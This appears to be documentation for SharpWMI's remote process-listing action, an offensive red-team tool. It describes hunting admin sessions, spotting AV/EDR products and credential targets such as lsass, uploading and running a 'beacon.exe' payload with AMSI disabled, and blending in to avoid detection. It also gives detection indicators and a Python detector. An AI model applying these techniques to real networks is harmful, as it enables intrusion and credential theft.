
Overview

The ps action enumerates running processes on local and remote systems, including process ID, name, owner, and command line. It queries the Win32_Process WMI class and invokes the GetOwner method to retrieve process ownership information.

Syntax

SharpWMI.exe action=ps [computername=HOST[,HOST2,...]] [username=DOMAIN\user] [password=Password]

Parameters

Parameter     Required  Description
action        Yes       Must be ps
computername  No        Target host(s), comma-separated. Defaults to localhost
username      No        Username for authentication
password      No        Password for authentication

Usage Examples

SharpWMI.exe action=ps

Example Output

   PID |                           Name |                     Owner | CommandLine
------+--------------------------------+---------------------------+------------------------------------------
  1234 |                   chrome.exe   |         DOMAIN\jdoe       | "C:\Program Files\Google\Chrome\Application\chrome.exe"
  5678 |                 powershell.exe |    DOMAIN\Administrator   | powershell.exe -NoProfile -ExecutionPolicy Bypass
  9012 |                      cmd.exe   |         DOMAIN\jdoe       | cmd.exe
  3456 |                  explorer.exe  |         DOMAIN\jdoe       | C:\Windows\Explorer.EXE
   748 |                   svchost.exe  |    NT AUTHORITY\SYSTEM    | C:\Windows\system32\svchost.exe -k NetworkService

Output Fields

Field        Description
PID          Process ID
Name         Process executable name
Owner        Domain\Username running the process
CommandLine  Full command line with arguments

Operational Use Cases

Scenario 1: Hunt for Admin Processes

# Look for admin-owned processes
SharpWMI.exe action=ps computername=workstation.domain.com
Identify:
  • Processes owned by domain admins
  • Privileged service accounts
  • SYSTEM-owned processes
  • Interactive admin sessions

Scenario 2: Detect Security Tools

# Enumerate processes on target
SharpWMI.exe action=ps computername=target.domain.com
Look for:
  • AV processes (MsMpEng.exe, AvastSvc.exe)
  • EDR agents (CrowdStrike, Carbon Black)
  • Monitoring tools (Sysmon)
  • PowerShell activity

Scenario 3: Identify Credential Sources

# Check for credential-rich processes
SharpWMI.exe action=ps computername=target.domain.com username="DOMAIN\admin" password="Password123!"
Target processes:
  • lsass.exe (credential dumping)
  • Browser processes (saved passwords)
  • Password managers (KeePass, 1Password)
  • Database connections

Scenario 4: Post-Exploitation Verification

# Verify payload execution
SharpWMI.exe action=upload computername=target source="beacon.exe" dest="C:\temp\svc.exe" amsi=disable
SharpWMI.exe action=exec computername=target command="C:\temp\svc.exe"
SharpWMI.exe action=ps computername=target
Confirm:
  • Beacon is running
  • Process ID and owner
  • Command line arguments
  • Parent process

Remote vs Local Usage

Local Enumeration
SharpWMI.exe action=ps
When to use:
  • Post-exploitation enumeration
  • Local process discovery
  • No remote access available
Advantages:
  • No network traffic
  • No authentication required
  • Faster execution

Detection Considerations

  • WMI queries for Win32_Process class
  • GetOwner method invocations
  • Event ID 5857: WMI activity
  • Sysmon Event ID 19-21: WMI operations
  • Process enumeration across multiple systems
  • Queries from non-administrative hosts
  • Bulk queries in short timeframe
  • Correlation with other enumeration
  • WMI/DCOM traffic on port 135
  • Multiple connections from single source
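As an added example (not part of SharpWMI or this page), the following Python turns the indicators above into a small detection: it takes normalized records of WMI operations, where the record shape, host names and operation strings are constructed assumptions styled on WMI-Activity logging, and flags any client host that ran Win32_Process queries or GetOwner calls against several distinct targets inside a short window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (time, client host, target host, WMI operation); the
# shape and operation strings are assumptions modelled on WMI-Activity logging.
PROC_Q = "IWbemServices::ExecQuery - root\\cimv2 : SELECT * FROM Win32_Process"
OWNER = 'IWbemServices::ExecMethod - root\\cimv2 : Win32_Process.Handle="748"::GetOwner'
OS_Q = "IWbemServices::ExecQuery - root\\cimv2 : SELECT LastBootUpTime FROM Win32_OperatingSystem"
SAMPLE_EVENTS = [
    # One client enumerating processes on three servers within two minutes.
    ("2024-05-01T10:00:01", "ws-ops01", "srv-fs01", PROC_Q),
    ("2024-05-01T10:00:02", "ws-ops01", "srv-fs01", OWNER),
    ("2024-05-01T10:00:40", "ws-ops01", "srv-db01", PROC_Q),
    ("2024-05-01T10:01:15", "ws-ops01", "srv-web01", PROC_Q),
    # A monitoring host polling uptime on many servers: not a Win32_Process query.
    ("2024-05-01T10:00:05", "mon01", "srv-fs01", OS_Q),
    ("2024-05-01T10:00:06", "mon01", "srv-db01", OS_Q),
    ("2024-05-01T10:00:07", "mon01", "srv-web01", OS_Q),
    # A help-desk admin checking one server: a single target, below threshold.
    ("2024-05-01T10:30:00", "ws-hd02", "srv-fs01", PROC_Q),
]

# Matches both operations the ps action generates: the Win32_Process query and
# the GetOwner method call on each returned instance.
WIN32_PROCESS_RE = re.compile(r"\bWin32_Process\b", re.IGNORECASE)

def is_process_enum(operation):
    """True if the WMI operation is a query or method call against Win32_Process."""
    return WIN32_PROCESS_RE.search(operation) is not None

def find_bulk_enumeration(events, window=timedelta(minutes=5), min_targets=3):
    """Return {client: sorted targets} for each client that ran Win32_Process
    operations against at least `min_targets` distinct hosts within `window`."""
    by_client = defaultdict(list)
    for time, client, target, operation in events:
        if is_process_enum(operation):
            by_client[client].append((datetime.fromisoformat(time), target))
    alerts = {}
    for client, hits in by_client.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:  # slide the window forward
                start += 1
            targets = {t for _, t in hits[start:end + 1]}
            if len(targets) >= min_targets:
                alerts[client] = sorted(targets)
                break  # one alert per client is enough for triage
    return alerts
```

Tune `window` and `min_targets` to the baseline of your own management hosts, since monitoring and patching systems legitimately query many machines.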

Best Practices

Operational Security

  • Limit query frequency
  • Blend with legitimate admin activity
  • Use during business hours
  • Avoid bulk enumeration

Data Analysis

  • Filter system processes
  • Focus on user-owned processes
  • Look for unusual command lines
  • Identify high-value targets

Filtering Process Output

Since SharpWMI returns all processes, you may want to filter results. Here are common targets:

Interesting Processes

  • PowerShell: powershell.exe, pwsh.exe
  • Credential Access: lsass.exe, mstsc.exe
  • Security Tools: MsMpEng.exe, cb.exe, falcon-sensor.exe
  • Browsers: chrome.exe, firefox.exe, msedge.exe
  • Shells: cmd.exe, conhost.exe

Troubleshooting

Cause: Insufficient privileges
Solution:
  • Use username and password parameters
  • Verify admin rights on target
  • Check UAC remote restrictions

Cause: GetOwner method failed
Solution:
  • Some system processes don’t have owners
  • This is normal for SYSTEM processes
  • Check permissions if user processes show empty

Cause: Network or service issue
Solution:
  • Verify target is online
  • Check firewall rules
  • Ensure WMI service is running

Alternative Query Methods

SharpWMI.exe action=query computername=target query="SELECT ProcessId,Name,CommandLine FROM Win32_Process WHERE Name='powershell.exe' OR Name='cmd.exe'"
SharpWMI.exe action=query computername=target query="SELECT ProcessId,Name FROM Win32_Process WHERE ExecutablePath LIKE '%temp%'"
SharpWMI.exe action=query computername=target query="SELECT ProcessId,Name FROM Win32_Process WHERE PercentProcessorTime > 50"